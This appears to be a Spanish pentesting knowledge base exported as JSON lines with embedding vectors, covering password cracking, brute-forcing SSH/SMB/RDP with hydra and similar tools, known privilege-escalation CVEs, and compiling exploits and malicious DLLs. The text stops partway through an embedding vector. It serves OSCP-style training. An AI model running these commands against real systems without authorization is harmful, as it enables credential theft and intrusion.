-0.00461, -0.06377, 0.07454, 0.07454, 0.03787, -0.0485, 0.09084, 0.0883, -0.07403, -0.12245, -0.07384, 0.02309, -0.14256, -0.04852, 0.06452, -0.10196, 0.06117, -0.01562, -0.01537, 0.03197, 0.00245, 0.08506, 0.01412, -0.13104, -0.02603, 0.01983, -0.0064, -0.04994, -0.03391, 0.04989, -0.06425, 0.01543, 0.01489, -0.03017, 0.0231, 0.03442, 0.04024, -0.03004, 0.06919, -0.03463, -0.01469, 0.00624, -0.02524, -0.01194, -0.03016, 0.0434, 0.03399, -0.02404, -0.01872, -0.01277, 0.00254, 0.09902, 0.03025, -0.0415, -0.10486, 0.05743, 0.02705, -0.02437, 0.00336, 0.04106, -0.02703, 0.01397, -0.01535, 0.02493, -0.00986, 0.02947, -0.04298, -0.01477, 0.0487, 0.02677, -0.07307, 0.05649, 0.06686, 0.07087, 0.03317, -0.06225, -0.05605, 0.02994, 0.04402, 0.05835, -0.05541, -0.02449, 0.05454, -0.00197, -0.05514, -0.03775, -0.04345, 0.01659, 0.06895, 0.05627, 0.12141, 0.01043, -0.02625, 0.02148, 0.00793, -0.04101, 0.02348, -0.03462, 0.00947, -0.01587, -0.05113, -0.00913, -0.00894, -0.04533, 0.05445, -0.04164, -0.0357, -0.04642, 0.00794, 0.0407, 0.05898, 0.01988, 0.05346, -0.02831, 0.05049, -0.03029, 0.0238, -0.03662, -0.02765, 0.0539, -0.00223, -0.01134, -0.02368, -0.02507, 0.02214, 0.00604, -0.04917, 0.02715, 0.00183, 0.05854, -0.03916, -0.09273, -0.00776, -0.03989, 0.04615, -0.00793, -0.03231, -0.01976, -0.01046, 0.02158, 0.03786, 0.06675, -0.07467, -0.01742, 0.04341, 0.00531, 0.02566, 0.04958, -0.04881, 0.04303, 0.00074, -0.03486, 0.03641, -0.03061, -0.00335, -0.01054, -0.01466, 0.03315, -0.02499, 0.03284, 0.01912, -0.05587, 0.01814, 0.02083, -0.08729, 0.01719, -0.04792, 0.01253, -0.02082, 0.02653, -0.00821, -0.09311, 0.02446, -0.0665, -0.06126, 0.0222, 0.00641, 0.00807, -0.03591, -0.05948, -0.02607, -0.07937, -0.00061, -0.0471]} +{"tipo": "metodologia", "herramienta": "Cracking de contraseñas", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseñas.md", "texto": "## John the Ripper\n```bash\nunshadow /etc/passwd /etc/shadow > unshadowed\njohn --format=NT hashes.txt --wordlist=rockyou.txt\nzip2john file.zip > z.hash ; rar2john ; ssh2john id_rsa ; keepass2john # extractores\njohn --rules --wordlist=rockyou.txt z.hash\n```", "v": [0.03918, -0.22612, -0.05701, 0.02404, 0.08218, -0.14486, -0.14933, -0.01506, 0.13735, 0.20492, -0.06742, -0.14461, 0.13846, 0.03424, 0.06112, 0.01319, 0.07462, 0.05576, -0.04088, 0.05988, -0.06771, 0.01528, -0.08022, -0.04957, 0.02836, 0.02904, -0.06001, 0.10286, -0.21551, 0.1124, 0.02956, -0.10008, -0.00225, 0.05505, -0.12353, 0.16259, 0.08917, 0.20604, -0.04481, 0.23109, -0.03837, 0.11309, -0.13589, 0.12073, -0.05535, -0.01393, -0.03744, 0.05853, 0.01641, 0.00323, 0.03778, 0.00311, -0.2252, 0.00871, 0.00136, -0.1657, 0.12499, -0.02652, -0.12833, -0.00769, -0.0668, 0.12236, -0.04202, -0.10283, 0.02883, 0.00141, 0.07694, -0.07258, -0.04193, 0.04942, -0.02925, 0.0205, 0.05858, 0.00181, -0.01172, 0.02703, -0.01737, -0.06408, 0.02616, 0.04146, -0.01474, -0.08287, -0.00883, 0.064, -0.1005, -0.00977, -0.01001, -0.05473, 0.01165, 0.04986, 0.05913, -0.04762, 0.05549, 0.07314, 0.0926, -0.073, 0.02474, 0.04301, 0.01609, 0.01959, -0.07578, 0.04627, 0.0084, 0.02356, 0.00878, -0.00794, 0.01222, 0.0323, -0.02075, 0.05299, 0.13246, 0.02057, 0.06392, 0.00317, -0.05124, -0.07221, -0.03446, -0.00105, -0.0585, -0.00929, 0.0112, -0.12612, -0.02099, 0.11008, -0.00176, -0.0235, -0.04813, 0.04866, -0.03021, 0.01489, 0.0379, 0.04645, -0.06224, -0.0097, -0.00595, 0.05824, -0.01359, 0.04711, 0.0018, -0.04223, 0.01008, 0.03888, -0.02393, 0.04497, 0.08969, 0.00976, 0.05849, -0.06443, -0.02922, -0.00598, 0.03584, 0.03416, 0.01659, 0.0215, 0.02154, 0.00851, 0.01505, -0.0304, -0.01633, -0.00157, -0.01503, 0.00478, 0.00084, 0.01867, -0.05694, 0.05788, 0.02444, -0.01184, -0.00185, -0.05711, -0.02014, -0.06111, 0.00521, -0.0594, -0.001, -0.08573, 0.02692, -0.02148, -0.00726, 0.00464, 0.02755, -0.0367, 0.04297, 0.05005, -0.00883, -0.01953, 0.00737, -0.05191, -0.04565, -0.0242, 0.01917, 0.05968, -0.05162, -0.0151, -0.03635, 0.00925, 0.01399, 0.00866, 0.00877, -0.02381, -0.05263, -0.00428, -0.03973, -0.01381, 0.03393, -0.0108, -0.011, -0.05032, 0.00316, -0.03332, 0.01036, 0.04755, 0.00128, 0.01524, -0.01165, -0.04777, -0.02242, 0.07737, 0.03647, -0.0211, -0.03759, 0.04689, 0.01407, -0.01603, 0.0099, 0.03648, 0.02258, 0.0319, -0.02142, 0.01428, -0.03973, 0.00329, 0.01695, 0.01335, 0.01876, -0.03068, -0.05846, 0.02693, 0.01571, -0.06141, 0.03499, 0.00788, 0.00568, -0.02216, -0.01161, 0.00586, -0.05823, 0.01184, 0.00394, 0.00117, -0.10081, -0.02045, 0.01683, -0.00909, -0.01878, -0.00768]} +{"tipo": "metodologia", "herramienta": "Cracking de contraseñas", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseñas.md", "texto": "## Wordlists a medida\n```bash\ncewl http://IP -m 6 -w custom.txt # palabras de la propia web\ncrunch 8 8 -t @@@@%%%% -o crunch.txt # patrones\n```", "v": [0.16082, -0.02837, 0.04707, -0.04233, 0.08068, -0.20148, 0.05508, 0.01634, 0.07547, 0.11659, 0.0152, -0.03996, 0.10691, 0.02874, -0.09202, -0.03206, -0.02179, -0.02463, 0.11154, 0.0141, 0.01575, -0.0571, -0.10008, -0.01065, -0.07699, -0.07522, -0.15451, 0.03794, -0.10405, 0.00578, -0.07815, -0.12418, 0.02234, 0.05785, 0.0054, 0.05136, -0.0324, 0.18158, -0.0592, 0.16033, 0.08528, 0.0315, -0.14448, 0.14734, 0.0589, -0.04756, -0.02798, 0.02625, -0.03054, -0.095, -0.09501, -0.1041, 0.01548, 0.06813, -0.04117, 0.03024, 0.16627, -0.00483, -0.13916, -0.02191, -0.0113, 0.08732, -0.02443, 0.00365, 0.08634, 0.10063, -0.0514, -0.01948, -0.0809, 0.06541, -0.03308, -0.08885, -0.04092, -0.01618, 0.11332, 0.04404, 0.00415, -0.00376, 0.04569, 0.08152, -0.03555, -0.15088, 0.0274, -0.09174, -0.0455, -0.03105, 0.01816, -0.06657, -0.03764, -0.01228, 0.08206, 0.05965, -0.06584, 0.04068, 0.09229, -0.08996, 0.02315, -0.05351, 0.04419, 0.04698, -0.10193, -0.01021, -0.07118, -0.10136, 0.10393, 0.04533, 0.0322, 0.01437, -0.06594, 0.01425, 0.14085, -0.00358, 0.09637, 0.02077, -0.06134, -0.03305, -0.11537, -0.02701, -0.03583, -0.10293, 0.02683, 0.01745, 0.00041, 0.02331, -0.09032, -0.03804, -0.06368, 0.09098, -0.03225, -0.04108, -0.00516, 0.05103, 0.01901, -0.06661, 0.01841, 0.07988, 0.01202, 0.08051, 0.031, -0.04983, 0.06716, 0.00777, -0.07729, 0.03752, 0.0301, 0.02976, 0.04986, -0.10514, -0.09843, 0.11679, 0.04757, 0.04529, 0.01219, 0.0042, -0.07965, -0.02655, -0.04989, 0.00135, 0.03212, -0.10152, -0.00989, -0.01869, -0.01468, 0.02529, -0.00585, 0.00429, 0.00844, 0.03525, 0.05818, 0.04357, 0.03093, 0.04574, -0.00256, -0.05007, 0.05129, -0.05353, 0.00722, 0.01118, 0.05177, -0.09229, 0.0068, -0.03627, -0.02673, -0.00812, -0.03172, -0.02847, 0.10312, 0.04394, -0.0892, 0.05471, 0.01708, -0.03858, 0.00809, -0.01663, 0.01375, 0.03306, -0.09421, 0.03363, -0.00996, -0.09182, -0.07868, 0.00277, 0.05552, 0.00379, -0.00831, 0.02694, -0.05187, -0.01021, -0.07162, -0.00334, 0.05316, -0.00634, -0.00144, -0.03196, -0.05141, -0.05577, 0.02681, 0.0011, -0.01854, 0.01596, -0.02133, 0.0477, 0.07109, 0.01533, -0.03085, 0.0438, -0.0196, -0.03828, 0.03513, -0.00194, -0.04385, -0.0976, 0.04674, 0.0653, 0.01764, 0.00999, -0.01351, 0.03579, 0.01687, -0.08597, 0.01735, 0.01791, 0.00453, -0.04719, -0.05736, -0.04019, -0.07863, 0.01686, -0.0456, 0.0139, -0.05867, -0.03951, -0.00539, -0.06263, -0.01679, -0.04797]} +{"tipo": "metodologia", "herramienta": "Cracking de contraseñas", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseñas.md", "texto": "## Online (servicio en vivo)\n```bash\nhydra -L users.txt -P rockyou.txt ssh://IP # ver Authentication attacks\nmedusa -h IP -u admin -P pass.txt -M smbnt\nfcrackzip -u -D -p rockyou.txt secret.zip # ZIP\ncrowbar -b rdp -s IP/32 -u admin -C pass.txt # RDP\n```\n\nRelacionado: Authentication attacks · Kerberoasting · Pass-the-Hash · OSCP MOC", "v": [0.00951, -0.22225, -0.09316, -0.09414, 0.10379, -0.25239, -0.08771, -0.0372, 0.05786, 0.23795, 0.06333, -0.08412, 0.11991, -0.09025, 0.00019, -0.03555, -0.01709, 0.06716, 0.10705, -0.11389, 0.07895, 0.09971, -0.06088, 0.00625, 0.02911, 0.10524, -0.11578, 0.05227, -0.1781, -0.11422, -0.01888, -0.0958, -0.09482, 0.07489, -0.13503, -0.00536, 0.05798, 0.1445, 0.03406, 0.18447, -0.00149, 0.0873, -0.08623, 0.11433, 0.04533, -0.00577, 0.0468, -0.01171, 0.04424, -0.06617, -0.06155, -0.0707, -0.17766, -0.02217, -0.11393, -0.02925, 0.01897, -0.04955, -0.01716, 0.06319, -0.03526, 0.14842, -0.07325, -0.08388, -0.0316, -0.02543, 0.0038, -0.04391, -0.09588, 0.07633, 0.02199, 0.06712, 0.02691, 0.01641, 0.04492, 0.00653, -0.0061, -0.06808, 0.09994, 0.03269, -0.02469, 0.01424, -0.11304, -0.00123, -0.09552, -0.05907, 0.09614, -0.1275, 0.0615, -0.00577, 0.07915, 0.04781, -0.027, 0.11592, 0.05334, -0.0753, -0.02391, -0.06014, -0.03947, -0.04802, -0.06246, 0.11385, -0.1201, 0.01957, 0.05189, 0.01625, 0.04099, 0.06276, 0.11035, -0.00571, 0.0954, -0.01038, 0.03, 0.00046, 0.0477, -0.10214, -0.02752, -0.01487, -0.00333, -0.02327, -0.10414, -0.05821, -0.01213, 0.03677, -0.05536, 0.02808, 0.01941, 0.05623, -0.03114, 0.01636, 0.01759, -0.00684, -0.04452, -0.00706, -0.02935, 0.04175, 0.04564, 0.03863, -0.01173, 0.01616, -0.0039, 0.01586, -0.03247, 0.11058, 0.06381, -0.01591, -0.03033, -0.07138, 0.00322, 0.03182, 0.07558, 0.03552, 0.01889, 0.00801, -0.02085, 0.02584, -0.02948, -0.02053, -0.01289, 0.02071, 0.00095, -0.00401, -0.02831, -0.001, -0.06627, 0.0307, -0.00547, 0.01508, 0.05517, -0.05961, 0.01696, -0.00871, 0.00601, -0.08128, -0.01458, -0.07542, 0.03578, -0.02131, 0.01593, -0.03082, -0.00773, -0.05672, 0.04129, 0.0243, -0.01313, -0.02114, 0.06973, 0.02202, -0.01048, -0.03587, 0.0264, -0.0024, -0.0511, 0.07429, 0.00709, -0.02626, -0.05862, -0.06958, -0.02319, -0.02191, -0.03192, 0.00121, -0.02675, -0.02418, 0.06037, -0.00671, 0.02425, 0.00597, -0.05119, -0.01503, 0.02109, 0.01124, 0.03606, -0.03868, -0.01324, -0.00918, 0.00222, 0.03562, 0.03581, -0.01868, -0.04298, 0.0332, 0.04699, -0.00086, 0.02424, -0.01503, 0.02466, -0.03106, -0.01081, 0.01208, -0.03354, 0.02549, -0.00575, -0.01349, 0.05909, -0.03685, -0.04666, 0.01848, -0.00469, -0.05063, 0.00707, 0.00247, 0.01484, -0.00678, -0.02261, -0.01921, -0.0697, 0.02493, 0.01398, -0.03583, -0.04542, -0.0307, -0.04506, -0.01896, -0.03552, -0.02441]} +{"tipo": "metodologia", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "texto": "# Exploits conocidos (CVEs)\n\n> Exploits públicos que aparecen una y otra vez. Localízalos con searchsploit y **léelos antes de lanzarlos**. Fuente: oscp.trastero.org/exploits.", "v": [-0.09498, -0.12009, -0.1876, -0.02449, 0.06261, -0.16635, 0.07005, -0.02697, -0.03243, -0.06183, -0.04345, -0.16165, 0.01136, 0.13964, 0.09377, -0.08491, 0.11489, 0.01552, 0.00259, -0.16307, -0.15893, 0.0155, -0.15176, -0.01133, 0.06465, 0.04512, -0.17886, -0.09357, -0.01027, 0.03248, -0.22585, 0.1056, -0.13666, 0.02441, 0.0664, 0.0257, 0.02739, -0.02199, 0.04933, 0.01587, 0.12444, 0.01951, -0.12525, 0.10474, 0.07669, -0.12566, -0.09456, -0.02022, -0.00943, -0.09237, -0.0439, -0.01839, -0.20598, -0.01959, -0.02608, -0.04511, -0.01978, 0.04315, -0.07525, 0.13795, -0.05434, 0.0245, -0.05158, -0.07885, 0.0194, -0.07642, 0.06099, 0.05098, -0.13764, -0.00631, -0.0866, 0.11013, 0.04835, -0.00393, -0.00798, -0.11657, 0.01431, -0.09498, 0.10074, 0.14821, -0.04815, -0.07446, -0.02959, -0.04274, -0.03865, -0.06938, 0.0122, 0.06589, -0.02229, -0.0301, 0.05594, 0.0276, -0.07757, 0.03309, -0.02433, -0.00229, 0.07213, 0.00113, -0.04811, 0.10857, -0.04291, -0.03084, -0.0588, 0.04465, -0.03843, 0.04736, -0.04122, -0.009, -0.04013, 0.02231, 0.11157, -0.07633, 0.04764, 0.04064, 0.03853, 0.00233, 0.01034, -0.04302, -0.03512, 0.00269, -0.05453, -0.08774, 0.01405, -0.02269, 0.00425, 0.00539, -0.00309, -0.0448, 0.04372, -0.01902, 0.10352, 0.01715, 0.02839, 0.01881, 0.03449, -0.11316, 0.10208, -0.01708, 0.02213, -0.02304, 0.05917, 0.02914, 0.00575, 0.00226, 0.06518, 0.01265, -0.00899, 0.03009, 0.03922, -0.02001, 0.009, -0.01684, 0.00723, 0.04801, -0.01242, -0.02572, 0.01721, 0.06399, -0.04117, 0.01205, 0.02771, 0.03667, 0.00994, 0.0143, -0.02318, 0.02172, 0.01098, -0.08647, -0.01274, -0.00828, 0.00931, 0.02619, 0.01474, -0.03672, 0.0405, -0.11412, 0.02536, -0.0478, 0.00811, 0.00241, 0.00959, 0.00185, -0.01979, 0.08795, 0.01025, -0.03226, 0.11578, -0.03255, 0.00858, -0.06053, 0.00409, -0.0753, 0.0255, 0.02798, 0.02945, 0.03798, 0.0023, -0.02514, 0.04372, -0.0173, -0.04655, -0.00748, -0.03687, -0.01925, 0.01965, 0.00123, 0.00377, 0.01023, -0.07452, 0.01404, 0.00251, 0.0086, 0.075, 0.04674, -0.1044, 0.03713, 0.01274, 0.03044, -0.02933, -0.00569, -0.03043, 0.08117, 0.06071, 0.02386, -0.00422, 0.01087, 0.00074, -0.06769, 0.00561, 0.04487, 0.02852, 0.01732, 0.00034, -0.06937, 0.00844, -0.05957, -0.00415, -0.00682, -0.01661, -0.02664, 0.04515, 0.00305, 0.03811, -0.01911, -0.02592, -0.03726, -0.00782, -0.02591, -0.0278, 0.01251, 0.01171, -0.10303, 0.0062, -0.07857, 0.03501, -0.00813]} +{"tipo": "metodologia", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "texto": "## Linux (privesc local)\n```\nCVE-2021-4034 PwnKit / pkexec (polkit) → casi universal, sin dependencias\nCVE-2021-3156 Baron Samedit (sudo)\nCVE-2022-0847 Dirty Pipe (kernel ≥5.8)\nCVE-2016-5195 Dirty COW (kernel viejo)\nCVE-2012-0056 Mempodipper\n```\nComprueba versión: `uname -a`, `sudo --version`, y mira Privesc Linux antes del kernel exploit.", "v": [-0.12172, -0.21656, -0.1196, -0.10693, 0.00332, -0.25014, 0.01148, 0.09153, -0.03043, -0.10985, 0.04147, -0.14939, -0.11594, -0.15523, -0.04619, -0.05698, -0.1668, -0.15913, 0.06583, -2e-05, -0.01276, 0.08607, -0.05023, 0.06276, 0.07663, 0.25842, 0.03109, 0.00907, 0.00156, -0.11928, 0.06638, 0.05265, 0.02291, 0.04449, 0.03437, 0.01462, -0.03355, 0.00506, -0.02119, 0.17858, 0.08679, -0.01048, -0.12646, 0.13359, 0.01031, -0.17666, 0.09799, -0.0324, 0.10912, -0.01818, -0.13627, 0.07228, -0.0485, -0.00658, 0.05878, 0.07045, 0.07458, -0.05028, -0.03155, -0.0807, -0.02725, -0.02599, 0.01512, -0.0433, 0.07829, -0.04046, -0.00706, -0.02587, -0.13973, 0.07213, -0.03643, 0.09388, -0.02726, -0.04096, 0.0359, -0.01427, -0.03134, -0.02454, 0.0956, 0.02492, -0.0094, 0.0278, -0.00934, 0.00895, -0.0696, -0.07528, 0.10691, -0.03576, -0.0629, -0.05005, 0.08225, -0.01639, 0.03585, 0.07021, 0.08131, -0.01225, 0.02741, 0.05173, 0.0088, -0.05714, -0.05625, 0.09413, -0.04971, 0.08447, 0.02428, 0.06317, -0.0227, -0.08495, 0.00326, 0.0085, 0.0346, 0.05897, -0.04093, 0.01185, -0.01813, 0.03431, -0.01252, 0.04544, -0.0265, -0.02458, -0.01717, -0.01433, -0.0007, 0.00627, -0.02622, -0.01314, -0.09292, 0.13134, 0.011, -0.09626, -0.04512, -0.0321, 0.09341, 0.023, -0.06876, 0.06789, 0.03925, -0.08941, 0.00607, 0.01524, 0.00837, 0.07625, -0.01519, 0.07384, 0.12747, 0.03608, 0.00062, -0.02453, 0.07301, 0.00237, 0.00675, 0.04422, -0.03129, -0.0538, -0.00285, -0.00975, 0.01795, -0.01176, 0.01819, 0.00582, 0.04845, 0.05258, -0.00011, -0.01456, -0.05916, 0.00894, -0.00028, -0.00844, 0.04367, -0.03226, 0.05681, 0.04854, -0.04388, 0.02118, 0.03145, -0.08681, 0.06035, -0.01637, -0.00427, 0.05024, -0.00572, 0.00845, -0.01142, 0.01322, 0.00074, -0.04043, -0.01149, -0.03597, 0.02334, -0.07768, 0.03684, 0.03592, -0.00938, -0.05279, 0.02556, 0.00072, -0.03707, -0.0118, -0.0008, -0.03573, -0.08721, 0.02444, -0.03321, -0.01913, -0.00793, 0.01334, -0.05663, -0.05032, -0.07049, 0.02343, -0.02255, 0.01294, 0.05707, 0.00303, -0.0113, 0.01473, 0.03186, -0.01017, 0.00376, -0.01249, 0.00028, 0.03582, 0.03521, -0.00645, 0.05265, -0.00563, 0.03039, 0.00352, 0.04454, -0.01789, -0.04602, 0.03544, 0.03224, -0.03592, 0.01205, -0.01067, 0.00192, 0.00641, -0.02848, -0.05787, -0.04187, -0.02582, -0.02196, -0.08539, -0.04311, -0.07261, 0.0171, -0.02056, -0.06892, -0.039, 0.00454, -0.01855, 0.02627, -0.0982, -0.03953, 0.02207]} +{"tipo": "metodologia", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "texto": "## Windows\n```\nMS17-010 EternalBlue (SMBv1) → foothold remoto\nPrintNightmare CVE-2021-1675 / 34527 → privesc/RCE vía spooler\nSpoolFool CVE-2022-21999 → privesc spooler\nHiveNightmare CVE-2021-36934 (SeriousSAM) → lee SAM como user\n```\nPotato family (SeImpersonate) → ver Potato attacks.", "v": [-0.24369, -0.21972, -0.07131, -0.07621, -0.04932, -0.24541, 0.02006, -0.16544, 0.08503, 0.04767, -0.04645, -0.10592, 0.13943, -0.10846, -0.03898, 0.07114, -0.08165, -0.09364, -0.0671, 0.12086, 0.03217, -0.04515, -0.05223, -0.01788, 0.09073, 0.22767, 0.00705, 0.15923, -0.07804, -0.12496, 0.11014, 0.00077, 0.03282, -0.00115, 0.0805, -0.10167, -0.09267, 0.01944, -0.1159, 0.08186, 0.03558, -0.01797, -0.14096, 0.10172, 0.06258, -0.11521, 0.00298, 0.01015, 0.03609, 0.02428, -0.17948, 0.12786, -0.03928, 0.03511, 0.08699, 0.08655, 0.04376, 0.06285, -0.13851, -0.04485, 0.05267, 0.00287, 0.02307, -0.016, 0.01643, -0.03841, 0.02933, -0.00798, -0.00237, 0.0916, -0.00464, 0.00147, -0.02446, -0.0534, 0.00393, 0.04598, 0.06479, 0.00601, 0.1638, -0.02074, -0.05183, 0.0694, -0.04339, -0.1146, 0.0088, 0.08383, 0.0952, -0.03288, -0.00891, -0.10983, 0.10732, -0.04828, -0.0082, 0.06807, 0.00413, 0.01632, -0.01535, -0.05032, -0.05732, -0.07587, -0.04382, 0.0322, 0.01416, 0.03587, -0.0363, 0.00905, 0.0079, -0.11028, -0.07196, -0.00831, -0.01029, 0.04746, 0.00855, 0.01778, -0.02611, 0.02155, 0.0021, 0.03993, 0.02887, 0.02172, 0.02067, 0.0085, 0.0155, -0.03168, -0.00056, -0.04441, -0.02216, 0.04767, -0.03208, -0.00474, -0.05118, 0.04287, 0.06318, -0.01211, -0.03779, 0.03581, -0.05165, -0.08209, 0.06676, 0.0213, -0.02786, 0.04336, 0.01062, 0.06717, 0.07033, -0.01608, -0.00765, 0.01655, 0.05359, 0.0026, 0.05683, 0.05833, -0.03911, -0.008, 0.0727, 0.02245, -0.0262, 0.02015, 0.00137, 0.03885, 0.03048, 0.09681, 0.04905, 0.00689, -0.00602, -0.00176, 0.01055, -0.08087, 0.00499, -0.11094, -0.00173, -0.00656, -0.03796, -0.00263, 0.02787, -0.01794, 0.03001, -0.01445, -0.04125, 0.01166, -0.0882, 0.00503, 0.00047, 0.04139, -0.00326, -0.06451, 0.00542, -0.04334, 0.03307, -0.02007, -0.03393, -0.01426, -0.01013, 0.01598, -0.05297, -0.05284, -0.05038, -0.00937, 0.05024, -0.00392, -0.05784, -0.03435, -0.04416, 0.00589, 0.01509, 0.03854, -0.05236, -0.05509, -0.10839, 0.0269, -0.05629, 0.00904, 0.04978, -0.01044, -0.02551, -0.01382, 1e-05, -0.02723, 0.02488, 0.00829, 0.00653, 0.01887, -0.01637, -0.05063, 0.02895, 0.01318, 0.03297, 0.00287, -0.00921, -0.06004, -0.00699, 0.03355, 0.0424, -0.06095, -0.0173, 0.01932, -0.02089, -0.03394, 0.0076, -0.00536, -0.01484, -0.04156, 0.00913, -0.06422, -0.00845, -0.10403, 0.04088, 0.01211, -0.03932, -0.02693, -0.00534, -0.03163, -0.02125, -0.05983, 0.00894, 0.05702]} +{"tipo": "metodologia", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "texto": "## Compilar\n```bash\ngcc exploit.c -o exploit # Linux\nx86_64-w64-mingw32-gcc evil.c -shared -o evil.dll # DLL Windows (cross-compile)\ni686-w64-mingw32-gcc evil.c -o evil.exe # EXE 32-bit\n```\nPara shellcode listo: msfvenom `-f exe` / `-f dll`.\n\n> ⚠️ Hay PoCs falsos/maliciosos. Lee el código antes de ejecutar (searchsploit).\n\nRelacionado: Privesc Windows · Privesc Linux · OSCP MOC", "v": [-0.06396, -0.12775, -0.04319, -0.02947, 0.02575, -0.21339, -0.06365, 0.08804, -0.03796, -0.02394, 0.00485, -0.0895, -0.11532, -0.0826, -0.01487, -0.13039, -0.01895, -0.11546, -0.09087, -0.07821, -0.03847, 0.07681, -0.07333, -0.05713, 0.08218, 0.16241, -0.15737, 0.0035, -0.04742, -0.10639, 0.01741, -0.00185, -0.01427, -0.04751, 0.00348, 0.07087, 0.0038, -0.06165, 0.01237, 0.216, 0.11275, 0.00613, -0.20842, 0.14392, -0.00263, -0.23337, 0.0464, 0.02162, 0.11418, -0.10555, -0.06291, 0.00451, -0.15726, 0.00828, 0.12691, -0.04654, 0.03077, -0.04474, -0.01462, 0.01089, -0.06962, 0.02751, 0.0039, -0.00353, 0.03801, 0.043, 0.04892, -0.02661, -0.14326, 0.09613, -0.03467, 0.10887, -0.07184, -0.10256, 0.06586, -0.06101, -0.04023, -0.09578, 0.14031, 0.00502, -0.04905, -0.0184, 0.02264, -0.07511, -0.04025, -0.07265, 0.00828, -0.00637, 0.02103, -0.03531, 0.09623, 0.02043, -0.079, 0.06281, 0.11719, -0.10643, 0.05715, 0.05895, 0.01705, 0.03135, -0.02659, -0.03619, -0.01142, 0.13299, -0.00393, 0.02986, 0.03172, -0.01941, -0.01248, 0.00239, 0.04374, -0.01372, 0.01762, 0.03051, -0.00529, -0.08477, -0.04826, 0.02107, -0.01314, 0.01075, -0.10558, -0.00655, -0.03134, 0.08523, -0.03557, -0.01147, -0.03779, 0.1031, -0.03358, -0.06758, -0.01915, -0.09766, 0.02414, -0.02921, -0.14763, 0.04679, 0.05726, -0.03914, 0.03479, -0.07676, 0.08192, 0.09043, 0.03289, 0.06432, 0.0532, 0.0684, -0.01453, -0.04808, -0.0006, -0.00527, 0.11522, 0.02571, -0.00509, -0.00387, -0.06567, -0.02195, 0.01866, 0.06248, 0.02038, -0.02521, 0.03097, 0.03964, -0.01412, -0.0071, -0.10539, 0.01942, 0.04166, -0.0336, 0.04358, -0.02866, -0.03572, 0.09102, 0.05232, -0.07082, 0.01158, -0.08601, 0.05774, -0.07018, 0.01141, -0.03598, -0.01235, -0.02154, 0.09229, 0.01297, -0.03431, -0.014, 0.01871, 0.03142, 0.00519, -0.00765, 0.01347, 0.00121, 0.01758, -0.06314, 0.00302, 0.00076, -0.03263, -0.05277, -0.01088, -0.04237, -0.03384, 0.01625, -0.00936, -0.01807, 0.06641, 2e-05, -0.00788, 0.01235, -0.03435, 0.02729, 0.03906, 0.02631, 0.02992, -0.04402, -0.02969, -0.01943, 0.00781, 0.03402, 0.03234, -0.00995, -0.04166, 0.03135, 0.07715, -0.01186, 0.01877, -0.04357, -0.00437, -0.00223, -0.00652, -0.01372, -0.01266, 0.03009, -0.00574, -0.04668, 0.01638, -0.01174, -0.00075, 0.01523, 0.00316, -0.06127, -0.00941, 0.02849, -0.02104, -0.07853, -0.02939, -0.04202, -0.02817, -0.02585, -0.00587, -0.02605, -0.05151, -0.02699, 0.02694, -0.05337, -0.03468, 0.01186]} +{"tipo": "metodologia", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "texto": "# Buffer Overflow (stack, 32-bit)\n\n> El clásico stack BOF de Windows. En el OSCP actual pesa menos (el examen va más a AD), pero sigue cayendo. Metodología de 7 pasos. Fuente: oscp.trastero.org/b0f.\n> Herramientas: **Immunity Debugger + mona.py**, `msf-pattern_create/offset`, `msfvenom`, `nc`.", "v": [-0.00816, -0.16464, -0.11629, -0.04131, -0.097, -0.08169, -0.07656, -0.08926, -0.17242, -0.01722, -0.08977, 0.05839, -0.09895, 0.00627, 0.00335, 0.00137, 0.01043, -0.0469, -0.06313, -0.01855, -0.10281, -0.01141, -0.10027, 0.05706, 0.15224, 0.18389, -0.15889, 0.02387, -0.12576, -0.08409, 0.17838, 0.00644, -0.01536, -0.04501, -0.01039, -0.08427, -0.02403, -0.10302, -0.02843, 0.20169, -0.07601, 0.08332, -0.03605, 0.12802, 0.0522, -0.0457, -0.00921, 0.07465, 0.05289, -0.00721, -0.0053, -0.17834, 0.00285, -0.00538, -0.12182, -0.08363, 0.056, 0.05447, 0.09628, 0.0171, 0.08784, 0.10523, -0.14204, -0.13213, 0.04162, -0.06589, -0.00383, -0.01744, -0.06763, 0.03926, -0.06711, -0.01384, 0.00267, -0.04262, 0.03577, -0.03552, 0.09977, -0.04159, 0.20927, 0.03257, -0.05933, -0.10374, -0.04653, 0.03888, 0.00488, -0.06731, 0.08658, -0.04407, 0.03034, -0.02806, 0.05432, -0.01613, -0.00363, 0.02425, 0.09677, -0.10414, 0.06152, 0.00024, 0.07005, -0.03114, -0.01034, -0.01074, 0.00367, -0.00442, -0.00118, 0.08416, 0.0666, 0.00597, -0.03076, -0.03227, 0.04989, 0.02591, 0.04753, 0.04161, -0.06531, -0.00575, 0.0318, 0.13053, -0.01668, 0.0439, -0.01898, 0.02274, -0.10951, 0.05526, -0.00686, -0.04391, 0.03205, 0.06068, -0.04933, 0.05841, -0.04783, -0.01145, -0.09623, 0.01505, -0.03647, -0.01194, 0.06514, 0.03453, 0.07841, -0.01391, 0.06079, 0.09793, 0.03794, 0.05294, 0.04391, -0.03401, 0.08102, -0.11616, -0.10303, -0.01917, 0.04584, 0.05513, -0.00284, 0.00277, 0.03276, -0.06431, -0.02174, 0.00919, -0.06254, 0.04208, -0.011, 0.08925, 0.00974, 0.02188, -0.05563, -0.06473, -0.004, -0.04837, -0.04324, -0.04277, 0.00392, 0.03347, -0.0382, -0.09344, 0.02136, -0.05531, 0.00361, -0.08539, -0.00936, -0.01237, -0.03962, 0.00215, 0.00023, 0.01174, 0.01653, 0.00361, 0.05384, 0.03214, 0.0022, 0.06484, 0.01061, -0.01942, -0.01602, 